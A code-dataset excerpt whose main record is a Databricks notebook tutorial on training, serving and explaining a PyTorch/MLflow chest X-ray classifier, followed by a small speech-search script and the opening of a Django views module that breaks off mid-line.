In this problem, only the images will be used, unpacked into an `.../images/` directory,, and the CSV file of label information `Data_Entry_2017.csv` at a `.../metadata/` path.\n# MAGIC \n# MAGIC The images can be read directly and browsed with Apache Spark:\n\n# COMMAND ----------\n\nraw_image_df = spark.read.format(\"image\").load(\"dbfs:/datasets/ScaDaMaLe/nih-chest-xrays/images/raw/\") # This is the path where the xray images has been uploaded into dbfs.\ndisplay(raw_image_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### Managing Unstructured Data with Delta Lake\n# MAGIC \n# MAGIC Although the images can be read directly as files, it will be useful to manage the data as a [Delta](https://delta.io/) table:\n# MAGIC \n# MAGIC - Delta provides transactional updates, so that the data set can be updated, and still read safely while being updated\n# MAGIC - Delta provides [\"time travel\"](https://docs.delta.io/latest/quick-start.html#read-older-versions-of-data-using-time-travel) to view previous states of the data set\n# MAGIC - Reading batches of image data is more efficient from Delta than from many small files\n# MAGIC - The image data needs some one-time preprocessing beforehand anyway\n# MAGIC \n# MAGIC In this case, the images are all 1024 x 1024 grayscale images, though some arrive as 4-channel RGBA. They are normalized to 224 x 224 single-channel image data:\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import BinaryType, StringType\nfrom PIL import Image\nimport numpy as np\n\ndef to_grayscale(data, channels):\n np_array = np.array(data, dtype=np.uint8)\n if channels == 1: # assume mode = 0\n grayscale = np_array.reshape((1024,1024))\n else: # channels == 4 and mode == 24\n reshaped = np_array.reshape((1024,1024,4))\n # Data is BGRA; ignore alpha and use ITU BT.709 luma conversion:\n grayscale = (0.0722 * reshaped[:,:,0] + 0.7152 * reshaped[:,:,1] + 0.2126 * reshaped[:,:,2]).astype(np.uint8)\n # Use PIL to resize to match DL model that it will feed\n resized = Image.frombytes('L', (1024,1024), grayscale).resize((224,224), resample=Image.LANCZOS)\n return np.asarray(resized, dtype=np.uint8).flatten().tobytes()\n\nto_grayscale_udf = udf(to_grayscale, BinaryType())\nto_filename_udf = udf(lambda f: f.split(\"/\")[-1], StringType())\n\nimage_df = raw_image_df.select(\n to_filename_udf(\"image.origin\").alias(\"origin\"),\n to_grayscale_udf(\"image.data\", \"image.nChannels\").alias(\"image\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The file of metadata links the image file name to its labels. 
These are parsed and joined, written to a Delta table, and registered in the metastore:\n\n# COMMAND ----------\n\nraw_metadata_df = spark.read.\\\n option(\"header\", True).option(\"inferSchema\", True).\\\n csv(\"dbfs:/datasets/ScaDaMaLe/nih-chest-xrays/metadata/\").\\\n select(\"Image Index\", \"Finding Labels\")\n\ndisplay(raw_metadata_df)\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import explode, split\nfrom pyspark.sql.types import BooleanType, StructType, StructField\n\ndistinct_findings = sorted([r[\"col\"] for r in raw_metadata_df.select(explode(split(\"Finding Labels\", r\"\\|\"))).distinct().collect() if r[\"col\"] != \"No Finding\"])\nencode_findings_schema = StructType([StructField(f.replace(\" \", \"_\"), BooleanType(), False) for f in distinct_findings])\n\ndef encode_finding(raw_findings):\n findings = raw_findings.split(\"|\")\n return [f in findings for f in distinct_findings]\n\nencode_finding_udf = udf(encode_finding, encode_findings_schema)\n\nmetadata_df = raw_metadata_df.withColumn(\"encoded_findings\", encode_finding_udf(\"Finding Labels\")).select(\"Image Index\", \"encoded_findings.*\")\n\ntable_path = \"/tmp/nih-chest-xrays/image_table/\"\nmetadata_df.join(image_df, metadata_df[\"Image Index\"] == image_df[\"origin\"]).drop(\"Image Index\", \"origin\").write.mode(\"overwrite\").format(\"delta\").save(table_path)\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS nih_xray;\n# MAGIC USE nih_xray;\n# MAGIC CREATE TABLE IF NOT EXISTS images USING DELTA LOCATION '/tmp/nih-chest-xrays/image_table/';\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we optimize the newly created table so that fetching data is more efficient.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC OPTIMIZE images;\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Modeling with PyTorch Lightning and MLflow\n# MAGIC \n# MAGIC [PyTorch](https://pytorch.org/) is of course one of the most popular tools for building deep learning models, and is well suited to build a convolutional neural net that works well as a multi-label classifier for these images. Below, other related tools like [`torchvision`](https://pytorch.org/docs/stable/torchvision/index.html) and [PyTorch Lightning](https://www.pytorchlightning.ai/) are used to simplify expressing and building the classifier.\n# MAGIC \n# MAGIC The data set isn't that large once preprocessed - about 2.2GB. For simplicity, the data will be loaded and manipulated with [`pandas`](https://pandas.pydata.org/) from the Delta table, and model trained on one GPU. It's also quite possible to scale to multiple GPUs, or scale across machines with Spark and [Horovod](https://github.com/horovod/horovod), but it won't be necessary to add that complexity in this example.\n\n# COMMAND ----------\n\nfrom sklearn.model_selection import train_test_split\n\ndf = spark.read.table(\"nih_xray.images\")\ndisplay(df)\n\n# COMMAND ----------\n\ntrain_pd, test_pd = train_test_split(df.toPandas(), test_size=0.1, random_state=42) # Need to increase spark.driver.maxResultSize to at least 8GB through pasting spark.driver.maxResultSize g in cluster Spark config\n\nfrac_positive = train_pd.drop(\"image\", axis=1).sum().sum() / train_pd.drop(\"image\", axis=1).size\ndisease_names = df.drop(\"image\").columns\nnum_classes = len(disease_names)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC `torchvision` provides utilities that make it simple to perform some model-specific transformation as part of the model. 
Here, a pre-trained network will be used which requires normalized 3-channel RGB data as PyTorch Tensors:\n\n# COMMAND ----------\n\nfrom torchvision import transforms\n\ntransforms = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Lambda(lambda image: image.convert('RGB')),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n])\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Define the `Dataset` and train/test `DataLoader`s for this data set in PyTorch:\n\n# COMMAND ----------\n\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\n\nclass XRayDataset(Dataset):\n def __init__(self, data_pd, transforms):\n self.data_pd = data_pd\n self.transforms = transforms\n \n def __len__(self):\n return len(self.data_pd)\n \n def __getitem__(self, idx):\n image = np.frombuffer(self.data_pd[\"image\"].iloc[idx], dtype=np.uint8).reshape((224,224))\n labels = self.data_pd.drop(\"image\", axis=1).iloc[idx].values.astype(np.float32)\n return self.transforms(image), labels\n\ntrain_loader = DataLoader(XRayDataset(train_pd, transforms), batch_size=64, num_workers=8, shuffle=True)\ntest_loader = DataLoader(XRayDataset(test_pd, transforms), batch_size=64, num_workers=8)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that [MLflow](https://mlflow.org/) natively supports [logging PyTorch models](https://mlflow.org/docs/latest/python_api/mlflow.pytorch.html#module-mlflow.pytorch) of course, but, can also automatically log the output of models defined with PyTorch Lightning:\n\n# COMMAND ----------\n\nimport mlflow.pytorch\n\nmlflow.pytorch.autolog()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Finally, the model is defined, and fit. For simple purposes here, the model itself is quite simple: it employs the pretrained [densenet121](https://pytorch.org/hub/pytorch_vision_densenet/) layers to do most of the work (layers which are not further trained here), and simply adds some dropout and a dense layer on top to perform the classification. No attempt is made here to tune the network's architecture or parameters further.\n# MAGIC \n# MAGIC For those new to PyTorch Lightning, it is still \"PyTorch\", but removes the need to write much of PyTorch's boilerplate code. Instead, a `LightningModule` class is implemented with key portions like model definition and fitting processes defined.\n# MAGIC \n# MAGIC _Note: This section should be run on a GPU. An NVIDIA T4 GPU is recommended, though any modern GPU should work. 
This code can also be easily changed to train on CPUs or TPUs._\n\n# COMMAND ----------\n\nimport torch\nfrom torch.optim import Adam\nfrom torch.nn import Dropout, Linear\nfrom torch.nn.functional import binary_cross_entropy_with_logits\nfrom sklearn.metrics import log_loss\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\nclass XRayNNLightning(pl.LightningModule):\n def __init__(self, learning_rate, pos_weights):\n super(XRayNNLightning, self).__init__()\n self.densenet = torch.hub.load('pytorch/vision:v0.6.0', 'densenet121', pretrained=True)\n for param in self.densenet.parameters():\n param.requires_grad = False\n self.dropout = Dropout(0.5)\n self.linear = Linear(1000, num_classes)\n # No sigmoid here; output logits\n self.learning_rate = learning_rate\n self.pos_weights = pos_weights\n\n def get_densenet():\n return self.densenet\n \n def forward(self, x):\n x = self.densenet(x)\n x = self.dropout(x)\n x = self.linear(x)\n return x\n\n def configure_optimizers(self):\n return Adam(self.parameters(), lr=self.learning_rate)\n\n def training_step(self, train_batch, batch_idx):\n x, y = train_batch\n output = self.forward(x)\n # Outputting logits above lets us use binary_cross_entropy_with_logits for efficiency, but also, allows the use of\n # pos_weight to express that positive labels should be given much more weight. \n # Note this was also proposed in the paper linked above.\n loss = binary_cross_entropy_with_logits(output, y, pos_weight=torch.tensor(self.pos_weights).to(self.device))\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, val_batch, batch_idx):\n x, y = val_batch\n output = self.forward(x)\n val_loss = binary_cross_entropy_with_logits(output, y, pos_weight=torch.tensor(self.pos_weights).to(self.device))\n self.log('val_loss', val_loss)\n\nmodel = XRayNNLightning(learning_rate=0.001, pos_weights=[[1.0 / frac_positive] * num_classes])\n\n# Let PyTorch handle learning rate, batch size tuning, as well as early stopping.\n# Change here to configure for CPUs or TPUs.\ntrainer = pl.Trainer(gpus=1, max_epochs=20, \n auto_scale_batch_size='binsearch',\n auto_lr_find=True,\n callbacks=[EarlyStopping(monitor='val_loss', patience=3, verbose=True)])\ntrainer.fit(model, train_loader, test_loader)\n\n# As of version MLFlow 1.13.1, the framework seems to have trouble saving the pytorch lightning module through mlflow.pytorch.autolog() even though it should according to the documentation.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC There seems to be a bug with MLFlow, not able to autolog model from Pytorch. Instead we save the trained model at a custom path instead, enabling us to load it in later stage.\n\n# COMMAND ----------\n\npath_to_model = \"/dbfs/tmp/xray\"\n\n# COMMAND ----------\n\nimport os.path, shutil\nfrom os import path\n\nif path.exists(path_to_model):\n print(\"A model already exists in this path. It will be overwritten...\")\n shutil.rmtree(path_to_model)\n mlflow.pytorch.save_model(model, path_to_model)\nelse:\n mlflow.pytorch.save_model(model, path_to_model)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Although not shown here for brevity, this model's results are comparable to those cited in the [paper](https://openaccess.thecvf.com/content_cvpr_2017/papers/Wang_ChestX-ray8_Hospital-Scale_Chest_CVPR_2017_paper.pdf) - about 0.6-0.7 AUC for each of the 14 classes. 
The auto-logged results are available in MLflow:\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### PSA: Don't Try (To Diagnose Chest X-rays) At Home!\n# MAGIC \n# MAGIC The author is not a doctor, and probably neither are you! It should be said that this is _not_ necessarily the best model, and certainly should not be used to actually diagnose patients! It's just an example.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Serving the Model with MLflow\n# MAGIC \n# MAGIC This auto-logged model is useful raw material. The goal is to deploy it as a REST API, and [MLflow can create a REST API and Docker container](https://mlflow.org/docs/latest/models.html#deploy-mlflow-models) around a `pyfunc` model, and even deploy to Azure ML or AWS SageMaker for you. It can also be deployed within Databricks for testing.\n# MAGIC \n# MAGIC However, there are a few catches which mean we can't directly deploy the model above:\n# MAGIC \n# MAGIC - It accepts images as input, but these can't be directly specified in the JSON request to the REST API\n# MAGIC - Its output are logits, when probabilities (and label names) would be more useful\n# MAGIC \n# MAGIC It is however easy to define a custom `PythonModel` that will wrap the PyTorch model and perform additional pre- and post-processing. This model accepts a base64-encoded image file, and returns the probability each label:\n\n# COMMAND ----------\n\nimport torch\nimport pandas as pd\nimport numpy as np\nimport base64\nfrom io import BytesIO\nfrom PIL import Image\nfrom mlflow.pyfunc import PythonModel\n\nclass XRayNNServingModel(PythonModel):\n def __init__(self, model, transforms, disease_names):\n self.model = model\n self.transforms = transforms\n self.disease_names = disease_names\n \n def get_model():\n return self.model\n \n def get_transforms():\n return self.transforms\n \n def get_disease_names():\n return disease_names\n\n def predict(self, context, model_input):\n def infer(b64_string):\n encoded_image = base64.decodebytes(bytearray(b64_string, encoding=\"utf8\"))\n image = Image.open(BytesIO(encoded_image)).convert(mode='L').resize((224,224), resample=Image.LANCZOS)\n image_bytes = np.asarray(image, dtype=np.uint8)\n transformed = self.transforms(image_bytes).unsqueeze(dim=0)\n output = self.model(transformed).squeeze()\n return torch.sigmoid(output).tolist()\n return pd.DataFrame(model_input.iloc[:,0].apply(infer).to_list(), columns=disease_names)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now the new wrapped model is logged with MLflow:\n\n# COMMAND ----------\n\nimport mlflow.pyfunc\nimport mlflow.pytorch\nimport mlflow.models\nimport pytorch_lightning as pl\nimport PIL\nimport torchvision\n\n# Load PyTorch Lightning model\n# Loading the model previously saved\nloaded_model = mlflow.pytorch.load_model(path_to_model, map_location='cpu') \n\nwith mlflow.start_run():\n model_env = mlflow.pyfunc.get_default_conda_env()\n # Record specific additional dependencies required by the serving model\n model_env['dependencies'][-1]['pip'] += [\n f'torch=={torch.__version__}',\n f'torchvision=={torchvision.__version__}',\n f'pytorch-lightning=={pl.__version__}',\n f'pillow=={PIL.__version__}',\n ]\n # Log the model signature - just creates some dummy data of the right type to infer from\n signature = mlflow.models.infer_signature(\n pd.DataFrame([\"dummy\"], columns=[\"image\"]),\n pd.DataFrame([[0.0] * num_classes], columns=disease_names))\n python_model = XRayNNServingModel(loaded_model, transforms, disease_names)\n 
mlflow.pyfunc.log_model(\"model\", python_model=python_model, signature=signature, conda_env=model_env) # This autolog worked. Seems to be an issue with autologging pytorch-lightning models...\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Registering the Model with MLflow\n# MAGIC \n# MAGIC The [MLflow Model Registry](https://databricks.com/product/mlflow-model-registry) provides workflow management for the model promotion process, from Staging to Production. The new run created above can be registered directly from the MLflow UI:\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC It can then be transitioned into the Production state directly, for simple purposes here. After that, enabling serving within Databricks is as simple as turning it on in the models' Serving tab:\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Accessing the Model with a REST Request\n# MAGIC \n# MAGIC Now, we can send images to the REST endpoint and observe its classifications. This could power a simple web application, but here, to demonstrate, it is called directly from a notebook.\n\n# COMMAND ----------\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimage_path = \"/dbfs/datasets/ScaDaMaLe/nih-chest-xrays/images/raw/00000001_000.png\"\nplt.imshow(mpimg.imread(image_path), cmap='gray')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Note:** In the next cell you need to use your Databricks token for accessing Databricks from the internet. It is best practice to use the Databricks Secrets CLI to avoid putting secret keys in notebooks. Please refer to [this guide](https://docs.databricks.com/security/secrets/index.html) for setting it up through the Databricks CLI.\n\n# COMMAND ----------\n\nimport base64\nimport requests\nimport pandas as pd\n\nwith open(image_path, \"rb\") as file:\n content = file.read()\n\ndataset = pd.DataFrame([base64.encodebytes(content)], columns=[\"image\"])\n# Note that you will still need a Databricks access token to send with the request. This can/should be stored as a secret in the workspace:\ntoken = dbutils.secrets.get(\"databricksEducational\", \"databricksCLIToken\") # These are just examples of a Secret Scope and Secret Key. Please refer to guide in above cell...\n\nresponse = requests.request(method='POST',\n headers={'Authorization': f'Bearer {token}'}, \n url='https://dbc-635ca498-e5f1.cloud.databricks.com/model/nih_xray/1/invocations',\n json=dataset.to_dict(orient='split'))\npd.DataFrame(response.json())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC The model suggests that a doctor might examine this X-ray for Atelectasis and Infiltration, but a Hernia is unlikely, for example.\n# MAGIC But, why did the model think so? Fortunately there are tools that can explain the model's output in this case, and this will be demonstrated a little later.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Adding Webhooks for Model State Management\n# MAGIC \n# MAGIC [MLflow can now trigger webhooks](https://databricks.com/blog/2020/11/19/mlflow-model-registry-on-databricks-simplifies-mlops-with-ci-cd-features.html) when Model Registry events happen. Webhooks are standard 'callbacks' which let applications signal one another. For example, a webhook can cause a CI/CD test job to start and run tests on a model. In this simple example, we'll just set up a webhook that posts a message to a Slack channel.\n# MAGIC \n# MAGIC _Note_: the example below requires a [registered Slack webhook](https://api.slack.com/messaging/webhooks). 
Because the webhook URL is sensitive, it is stored as a secret in the workspace and not included inline.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The Slack Webhook part of the tutorial has not been tested. Feel free to try to set it up.\n\n# COMMAND ----------\n\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.utils.rest_utils import http_request\nimport json\n\ndef mlflow_call_endpoint(endpoint, method, body = '{}'):\n client = MlflowClient()\n host_creds = client._tracking_client.store.get_host_creds()\n if method == 'GET':\n response = http_request(host_creds=host_creds, endpoint=f\"/api/2.0/mlflow/{endpoint}\", method=method, params=json.loads(body))\n else:\n response = http_request(host_creds=host_creds, endpoint=f\"/api/2.0/mlflow/{endpoint}\", method=method, json=json.loads(body))\n return response.json()\n\njson_obj = {\n \"model_name\": \"nih_xray\",\n \"events\": [\"MODEL_VERSION_CREATED\", \"TRANSITION_REQUEST_CREATED\", \"MODEL_VERSION_TRANSITIONED_STAGE\", \"COMMENT_CREATED\", \"MODEL_VERSION_TAG_SET\"],\n \"http_url_spec\": { \"url\": dbutils.secrets.get(\"demo-token-sean.owen\", \"slack_webhook\") }\n}\nmlflow_call_endpoint(\"registry-webhooks/create\", \"POST\", body=json.dumps(json_obj))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As model versions are added, transitioned among stages, commented on, etc. a webhook will fire.\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Explaining Predictions\n# MAGIC \n# MAGIC [SHAP](https://shap.readthedocs.io/en/latest/) is a popular tool for explaining model predictions. It can explain virtually any classifier or regressor at the prediction level, and estimate how much each input feature contributed positively or negatively to the result, and by how much.\n# MAGIC \n# MAGIC In MLflow 1.12 and later, SHAP model explanations can be [logged automatically](https://www.mlflow.org/docs/latest/python_api/mlflow.shap.html):\n# MAGIC \n# MAGIC \n# MAGIC \n# MAGIC However, this model's inputs are not simple scalar features, but an image. SHAP does have tools like `GradExplainer` and `DeepExplainer` that are specifically designed to explain neural nets' classification of images. To use this, we do have to use SHAP manually instead of via MLflow's automated tools. However the result can be, for example, logged with a model in MLflow.\n# MAGIC \n# MAGIC Here we explain the model's top classification, and generate a plot showing which parts of the image most strongly move the prediction positively (red) or negatively (blue). 
The explanation is traced back to an early intermediate layer of densenet121.\n\n# COMMAND ----------\n\nimport numpy as np\nimport torch\nimport mlflow.pyfunc\nimport shap\n\n# Load the latest production model and its components\npyfunc_model = mlflow.pyfunc.load_model(\"models:/nih_xray/production\")\ntransforms = pyfunc_model._model_impl.python_model.transforms\nmodel = pyfunc_model._model_impl.python_model.model\ndisease_names = pyfunc_model._model_impl.python_model.disease_names\n\n# Let's pick an example that definitely exhibits some affliction\ndf = spark.read.table(\"nih_xray.images\")\nfirst_row = df.filter(\"Infiltration\").select(\"image\").limit(1).toPandas()\nimage = np.frombuffer(first_row[\"image\"].item(), dtype=np.uint8).reshape((224,224))\n\n# Only need a small sample for explanations\nsample = df.sample(0.02).select(\"image\").toPandas()\nsample_tensor = torch.cat([transforms(np.frombuffer(sample[\"image\"].iloc[idx], dtype=np.uint8).reshape((224,224))).unsqueeze(dim=0) for idx in range(len(sample))])\n\ne = shap.GradientExplainer((model, model.densenet.features[6]), sample_tensor, local_smoothing=0.1)\nshap_values, indexes = e.shap_values(transforms(image).unsqueeze(dim=0), ranked_outputs=3, nsamples=300)\n\nshap.image_plot(shap_values[0][0].mean(axis=0, keepdims=True),\n transforms(image).numpy().mean(axis=0, keepdims=True))\n\n# COMMAND ----------\n\nimport pandas as pd\n\npd.DataFrame(torch.sigmoid(model(transforms(image).unsqueeze(dim=0))).detach().numpy(), columns=disease_names).iloc[:,indexes.numpy()[0]]\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC This suggests that the small region at the top of left lung is more significant in causing the model to produce its positive classifications for Infiltration, Effusion and Cardiomegaly than most of the image, and the bottom of the left lung however contradicts those to some degree and is associated with lower probability of that classification.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ## Managing Notebooks with Projects\n# MAGIC \n# MAGIC This notebook exists within a Project. This means it and any related notebooks are backed by a Git repository. The notebook can be committed, along with other notebooks, and observed in the source Git repository.\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Uploading Data to Databricks Shard (Mac)\n# MAGIC \n# MAGIC **Step 1:**\n# MAGIC Download [Homebrew](https://brew.sh/index_sv) - follow the instructions on the link.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 2:**\n# MAGIC Download python with brew in order to get pip on your computer. Follow this guide [here](https://docs.python-guide.org/starting/install3/osx/) for installing Python and adding it to your PATH.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 3:**\n# MAGIC Install Databricks CLI\n# MAGIC \n# MAGIC Run the following command in your terminal to install the Databricks Command Line Interface:\n# MAGIC \n# MAGIC `pip install databricks-cli`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 4:** Press your user symbol in the upper right of this page and press _User Settings_. Press _Access Tokens_ and generate a new token with an appropriate name and appropriate lifetime. 
This is for connecting your local computer to this specific Databricks shard.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 5:** Follow the instructions for configuring your Databricks CLI with your generated token [here](https://docs.databricks.com/dev-tools/cli/index.html). \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 6:** Download the data from [Kaggle Chest X-rays](https://www.kaggle.com/nih-chest-xrays/data).\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 7:** Run the command below in your local terminal. **Note:** You might need to run multiple commands since the Kaggle images lie in different folders after download. In this case, separate each command with a `;`.\n# MAGIC \n# MAGIC `dbfs cp -r dbfs:/datasets/;`\n# MAGIC `dbfs cp -r dbfs:/datasets/`\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **Step 8:** After the commands have successfully completed, the images should lie within the Databricks shard in the following path:\n# MAGIC \n# MAGIC `/dbfs/datasets/`\n# MAGIC \n# MAGIC You can verify this by running the following command in any notebook on the Databricks shard into which you uploaded the images:\n# MAGIC \n# MAGIC `%sh ls /dbfs/datasets/`","sub_path":"dbcArchives/2021/000_6-sds-3-x-dl/064x_MLOps_with_Pytorch_and_MLflow_for_Image_Classification.py","file_name":"064x_MLOps_with_Pytorch_and_MLflow_for_Image_Classification.py","file_ext":"py","file_size_in_byte":29478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"436811985","text":"from src.acquire import AudioAcquire\nfrom src.speech_to_text import speech_to_text\nfrom src.search import Search\n\n\ndef main():\n a = AudioAcquire()\n s = Search()\n\n while True:\n input('Press Enter to acquire...')\n text = speech_to_text(a.read())\n s.google(text)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"525246541","text":"\"\"\"\nmethod.views\n\"\"\"\nfrom datetime import datetime\nimport itertools\nimport logging\nfrom subprocess import CalledProcessError\n\nfrom django.db import transaction\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\nfrom container.models import Container\nfrom metadata.models import CompoundDatatype\nfrom method.models import CodeResource, Method, MethodDependency, \\\n MethodFamily, CodeResourceRevision, DockerImage\nfrom method.forms import CodeResourcePrototypeForm, CodeResourceRevisionForm, \\\n CodeResourceDetailsForm, CodeResourceRevisionDetailsForm, \\\n MethodFamilyForm, MethodForm, MethodReviseForm, MethodDependencyForm, \\\n MethodDetailsForm, TransformationXputForm, XputStructureForm, DockerImageForm\nfrom portal.views import developer_check, admin_check\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resources(request):\n \"\"\"\n Display a list of all code resources (parents) in database\n \"\"\"\n t = loader.get_template('method/resources.html')\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_revisions(request, pk):\n \"\"\"\n Display a list of all revisions of a specific 
Code Resource in database.\n \"\"\"\n coderesource = CodeResource.check_accessible(pk, request.user)\n\n addable_users, addable_groups = coderesource.other_users_groups()\n\n if request.method == 'POST':\n # We are attempting to update the CodeResource's metadata/permissions.\n resource_form = CodeResourceDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=coderesource\n )\n\n if resource_form.is_valid():\n try:\n coderesource.name = resource_form.cleaned_data[\"name\"]\n coderesource.description = resource_form.cleaned_data[\"description\"]\n coderesource.clean()\n coderesource.save()\n coderesource.grant_from_json(resource_form.cleaned_data[\"permissions\"])\n\n # Success -- go back to the resources page.\n return HttpResponseRedirect('/resources')\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n resource_form.add_error(None, e)\n\n else:\n resource_form = CodeResourceDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\"name\": coderesource.name, \"description\": coderesource.description}\n )\n\n revisions = CodeResourceRevision.filter_by_user(\n request.user,\n queryset=coderesource.revisions.all()).order_by('-revision_number')\n if len(revisions) == 0:\n # Go to the resource_revision_add page to create a first revision.\n t = loader.get_template('method/resource_revision_add.html')\n crv_form = CodeResourceRevisionForm()\n\n c = {\n 'revision_form': crv_form,\n 'parent_revision': None,\n 'coderesource': coderesource,\n }\n return HttpResponse(t.render(c, request))\n\n # Load template, setup context\n t = loader.get_template('method/resource_revisions.html')\n c = {\n 'coderesource': coderesource,\n \"resource_form\": resource_form,\n 'revisions': revisions,\n 'is_admin': admin_check(request.user),\n \"is_owner\": request.user == coderesource.user\n }\n return HttpResponse(t.render(c, request))\n\n\n@transaction.atomic\ndef _make_crv(file_in_memory,\n creating_user,\n crv_form,\n parent_revision=None,\n code_resource=None):\n \"\"\"\n Helper that creates a CodeResourceRevision (and a CodeResource as well if appropriate).\n \"\"\"\n assert isinstance(crv_form, (CodeResourcePrototypeForm, CodeResourceRevisionForm))\n # If parent_revision is specified, we are only making a CodeResourceRevision and not its parent CodeResource.\n assert not (parent_revision is None and isinstance(crv_form, CodeResourceRevision))\n\n cr_filename = \"\" if file_in_memory is None else file_in_memory.name\n\n if code_resource is None and parent_revision is not None:\n code_resource = parent_revision.coderesource\n if code_resource is None:\n # crv_form is a CodeResourcePrototypeForm.\n code_resource = CodeResource(\n name=crv_form.cleaned_data['resource_name'],\n description=crv_form.cleaned_data['resource_desc'],\n filename=cr_filename,\n user=creating_user\n )\n try:\n code_resource.full_clean()\n # Skip the clean until later; after all, we're protected by a transaction here.\n code_resource.save()\n except ValidationError as e:\n crv_form.add_error('content_file', e.error_dict.get('filename', []))\n crv_form.add_error('resource_name', e.error_dict.get('name', []))\n crv_form.add_error('resource_desc', e.error_dict.get('description', []))\n raise e\n\n code_resource.grant_from_json(crv_form.cleaned_data[\"permissions\"])\n\n rev_name = \"Prototype\"\n rev_desc = crv_form.cleaned_data[\"resource_desc\"]\n else:\n rev_name = crv_form.cleaned_data[\"revision_name\"]\n rev_desc = 
crv_form.cleaned_data[\"revision_desc\"]\n\n # Modify actual filename prior to saving revision object.\n if file_in_memory is not None:\n file_in_memory.name += '_' + datetime.now().strftime('%Y%m%d%H%M%S')\n\n revision = CodeResourceRevision(\n revision_parent=parent_revision,\n revision_name=rev_name,\n revision_desc=rev_desc,\n coderesource=code_resource,\n content_file=file_in_memory,\n user=creating_user\n )\n # This sets the MD5.\n\n try:\n revision.clean()\n except ValidationError as e:\n crv_form.add_error(None, e)\n raise e\n\n revision.save()\n revision.grant_from_json(crv_form.cleaned_data[\"permissions\"])\n\n try:\n code_resource.full_clean()\n revision.full_clean()\n except ValidationError as e:\n crv_form.add_error(None, e)\n raise e\n\n return revision\n\n\n@login_required\n@user_passes_test(developer_check)\ndef resource_add(request):\n \"\"\"\n Add a new code resource with a prototype (no revisions). The FILENAME of the prototype will\n be used as the symbolic filename for all subsequent revisions of this code resource.\n The actual filename will be suffixed with date and time when saved to the filesystem.\n On execution, Shipyard will refer to a revision's CodeResource to get the original filename and\n copy the revision file over to the sandbox.\n NAME provides an opportunity to provide a more intuitive and user-accessible name.\n \"\"\"\n creating_user = request.user\n\n if request.method != 'POST':\n resource_form = CodeResourcePrototypeForm()\n else:\n # Using forms here provides validation and better parsing of parameters in the request.\n resource_form = CodeResourcePrototypeForm(request.POST, request.FILES)\n\n if resource_form.is_valid():\n # Now we can try to create objects in the database, catching backend-raised exceptions as we go.\n try:\n _make_crv(request.FILES.get(\"content_file\", None),\n creating_user,\n resource_form)\n\n # Success -- return to the resources root page.\n return HttpResponseRedirect('/resources')\n except ValidationError:\n # All forms have the appropriate errors attached.\n pass\n\n t = loader.get_template('method/resource_add.html')\n c = {\n 'resource_form': resource_form,\n }\n return HttpResponse(t.render(c, 